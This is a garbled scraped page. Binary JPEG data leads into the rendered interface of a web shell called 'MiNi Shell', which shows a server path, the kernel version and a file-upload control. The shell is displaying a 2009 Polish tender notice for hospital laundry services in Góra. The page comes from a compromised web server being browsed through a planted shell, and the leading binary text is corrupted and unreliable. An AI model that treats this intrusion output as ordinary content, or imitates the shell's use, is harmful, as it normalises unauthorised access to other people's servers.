JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090306/53078-N-2009.html

<p class="kh_header"><b>Góra: Kompleksowe świadczenie usług pralniczych  dla potrzeb SPZOZ w Górze.</b><br>
<b>Numer ogłoszenia: 53078 - 2009; data zamieszczenia: 06.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej w Górze , ul. Hirszfelda 8, 56-200 Góra, woj. dolnośląskie, tel. 065 5432414, faks 065 5432251.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozgora.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe świadczenie usług pralniczych  dla potrzeb SPZOZ w Górze..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zadań objętych zamówieniem obejmuje:
1.Pranie wodne, czyszczenie chemiczne,dezynfekcja chemiczno -termiczna materacy i bielizny pościelowej, płukanie, krochmalenie, suszenie, maglowanie ,prasowanie, bieżąca reperacja, segregacja i pakowanie bielizny oraz transport bielizny , pościeli i odzieży czystej i brudnej z i do szpitala przez okres 24 miesięcy od dnia obowiązywania umowy zgodnie z normami sanitarno-epidemiologicznymi w następujących rodzajach:
a)bielizna pościelowa z oddziałów szpitalnych 
b)      	bielizna i odzież operacyjna, 
c)	odzież ochronna personelu medycznego,
d)	ręczniki, ścierki, bielizna stołowa,
e)	koce, (wymaga się w ostatnim cyklu prania zastosowania środków 		zmiękczających i antystatycznych)
f)	odzież robocza,
g)	poduszki, kołdry, podkłady, firany, zasłony i materace,
h)       	mopy i ścierki do podłóg


	2.Odbiór bielizny brudnej i dowóz bielizny czystej wraz z transportem oraz za i wyładunkiem 	zapewnia wykonawca. Koszty transportu muszą być wliczone w cenę 1 kg prania.

Przewiduje się , że do prania oddawane będzie ok.  2.520 kg bielizny różnego rodzaju, średnio miesięcznie.
Przewidywana ilość przedmiotu zamówienia w okresie trwania umowy wynosi 60.480 kg.
	


3.	Usługi wykonywane będą w pomieszczeniach oraz przy użyciu maszyn  i środków 	piorących wykonawcy; pralnia , w której wykonywane będą usługi winny, posiadać 	zezwolenie właściwego organu sanitarno -epidemiologicznego na pranie bielizny 	szpitalnej.
	
4.Pralnia , w której wykonywane będzie zamówienie winna posiadać barierę 			higieniczną.

	5.Środki piorące i dezynfekcyjne używane do wykonania zamówienia muszą posiadać 	test PZH, a także być ujęte w wykazie PZH  Preparaty dezynfekcyjne do stosowania w zakładach opieki zdrowotnej.
	Środki te powinny cechować się właściwościami piorąco- dezynfekcyjnymi 	o szerokim spektrum działania w warunkach :
	-temperatura minimum 60 0 C ( dla rodzajów bielizny opisanych w  pkt. 1. a-f )
	-czas prania  20 min.
	Środki piorące powinny być dozowane automatycznie.
            6. Wymaga się by bielizna odbierana była do prania i dowożona po praniu w dni robocze  w godzinach przedpołudniowych co najmniej raz dziennie.

	7.	Proces prania w poszczególnych rodzajach bielizny winien być prowadzony zgodnie z zatwierdzonymi przez zamawiającego procedurami i technologiami.

	8.Wymagane jest prowadzenie dokumentacji procesu prania.

9.Odbiór bielizny do prania oraz jej dowóz - po praniu odbywać się będzie transportem wykonawcy.

	10.Usługi muszą być wykonywane z zachowaniem przepisów obowiązujących   w ochronie  zdrowia, a zwłaszcza z zachowaniem obowiązujących reżimów sanitarnych.

11.	Za wykonanie usług zgodnie z wymaganiami wykonawca ponosił będzie 	odpowiedzialność przed zamawiającym oraz przed uprawnionymi organami 	kontroli zewnętrznej.

12.	Oferty należy złożyć na oryginalnym   formularzu ofertowym załączonym do niniejszej specyfikacji. Jeśli  formularz ofertowy nie będzie zawierał, wszystkich wymaganych informacji lub zostaną   w nim stwierdzone błędy  w wyliczeniu ceny, których nie można poprawić, oferta zostanie  odrzucona. Formularz może być wypełniony pismem ręcznym, trwałym, czytelnym, bez poprawek lub komputerowo. Nie dopuszcza się złożenia ofert na formularzach innych niż oryginalne lub skopiowane z oryginału. 

13.	Oferta może być złożona tylko na całość przedmiotu zamówienia.
Zamawiający nie wyraża zgody na złożenie oferty częściowej, ani też oferty wariantowej.  

	14.   	Treść oferty winna odpowiadać treści niniejszej specyfikacji.

	15.    	Każdy wykonawca  może złożyć tylko jedną ofertę..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> III.  Opis warunków  udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków 
1.   O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy spełniający 
      warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy, tzn:
a)posiadają uprawnienia do wykonywania określonej działalności lub czynności,
      jeżeli  ustawy nakładają obowiązek posiadania takich uprawnień;
b)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2.  Zgodnie z art. 44 ustawy wykonawca wraz z ofertą składa oświadczenie o spełnieniu 
     warunków udziału w postępowaniu.
3.  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia wymaga 
     się, aby przynajmniej jeden z wykonawców (lub wspólnie) spełniał wymagania, o których 
     mowa w ust. I. pkt a-c SIWZ. W przypadku konsorcjum żaden z wykonawców wspólnie
     ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu na podstawie 
     art. 24 ust. 1 i 2 ustawy.
4.  Zamawiający dokona oceny spełniania przez wykonawców warunków udziału w
      postępowaniu na podstawie załączonych do oferty dokumentów i oświadczeń
     wymienionych  w rozdziale IV siwz.
     Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez
     Zamawiającego zgodnie z formułą spełnia nie spełnia. Z treści załączonych do oferty
     dokumentów musi wynikać jednoznacznie, że w w warunki wykonawca spełnił. 
     W przypadku niespełnienia jakiegokolwiek warunku udziału w postępowaniu
     Wykonawca zostanie wykluczony  z postępowania na podstawie art. 24 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> IV. Wykaz oświadczeń i dokumentów, jakie mają dostarczyć wykonawcy w celu 
                   potwierdzenia spełniania warunków udziału w postępowaniu
Lp	Nazwa dokumentu	Nr załącznika
1	Złożenie właściwej i właściwie podpisanej oferty	dodatek nr 1 do siwz
2	Formularz cenowy	Dokument ten stanowi załącznik nr 1 do oferty dodatek nr 2 do siwz
3	Oświadczenie z art. 22 ust. 1 Pzp.	Dokument ten stanowi załącznik nr 2 do oferty oraz dodatek nr 3 do siwz
4	Oświadczenie z art. 44 Pzp.	Dokument ten stanowi załącznik nr 3 do oferty oraz dodatek nr 4 do siwz
  5	Wykaz  trzech usług wykonanych w ciągu ostatnich 3 lat  w zakresie prania bielizny szpitalnej poświadczony referencjami,że zamówienia zostały wykonane z należytą starannością.	Dokument ten stanowi załącznik nr 4 do oferty oraz dodatek nr 5 do swiz
6	Koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek posiadania tych dokumentów na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym.	Dokument ten stanowi załącznik nr 5 do oferty
7	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.	Dokument ten stanowi załącznik nr 6do oferty 
8	Pełnomocnictwa dla osób niewskazanych w KRS do występowania w imieniu wykonawcy, w tym do składania oświadczeń woli w imieniu wykonawcy, w toku postępowania o udzielenie niniejszego zamówienia. W przypadku oferty grupy podmiotów (np. konsorcjum) wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia.	Dokument ten stanowi załącznik nr 7 do oferty
9	Zezwolenie właściwego organu sanitarno-epidemiologicznego na pranie bielizny szpitalnej wystawione nie wcześniej niż 3 miesiące przed dniem składania ofert	Dokument ten stanowi załącznik nr 8
10	Formularz umowy	Dokument ten stanowi załącznik nr 9 do oferty oraz dodatek nr 6 do siwz
1.  Wymagane dokumenty należy złożyć w formie oryginałów lub kserokopii.
     Dokumenty przedstawione w formie kserokopii muszą być poświadczone za zgodność z 
     oryginałem przez wykonawcę.
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej
     Polskiej, zamiast dokumentu, o których mowa w wierszu 6 tabeli, składa dokument 
     wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający
     że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 
     6 miesięcy przed upływem terminu składania ofert.
3.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o których mowa w pkt 2, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
4.	W przypadku składania oferty przez wykonawców ubiegających się o udzielenie zamówienia zgodnie z art. 23 P.z.p. (konsorcjum) dokumenty wskazane w wierszu 6 tabeli składają wszyscy wykonawcy.
5.	Dokumenty należy złożyć w formie oryginału lub kopii poświadczonej  za zgodność        z oryginałem przez wykonawcę.
      Wszelkie dokumenty sporządzone w języku obcym, składane są pod rygorem nieważności
      wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
6.  Zamawiający zgodnie z art. 26 ust. 3 Pzp wzywa wykonawców, którzy w określonym
      terminie nie złożyli dokumentów potwierdzających spełnienie warunków udziału w 
      postępowaniu lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane 
      oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe 
      pełnomocnictwa, do ich złożenia w wyznaczonym terminie,  chyba że mimo ich złożenia
      oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie
       postępowania.  
7.  Zamawiający  zgodnie z art. 26 ust. 4  wzywa w terminie przez siebie wyznaczonym 
     Wykonawców do złożenia wyjaśnień  dotyczących oświadczeń lub dokumentów,  
     o których mowa w art. 25 ust. 1 Pzp..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.spzozgora.com.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej w Górze
ul. Hirszfelda 8
56-200 Góra.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2009 godzina 10:00, miejsce: SPZOZ Góra ul. Hirszfelda 8, 56-200 Góra Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com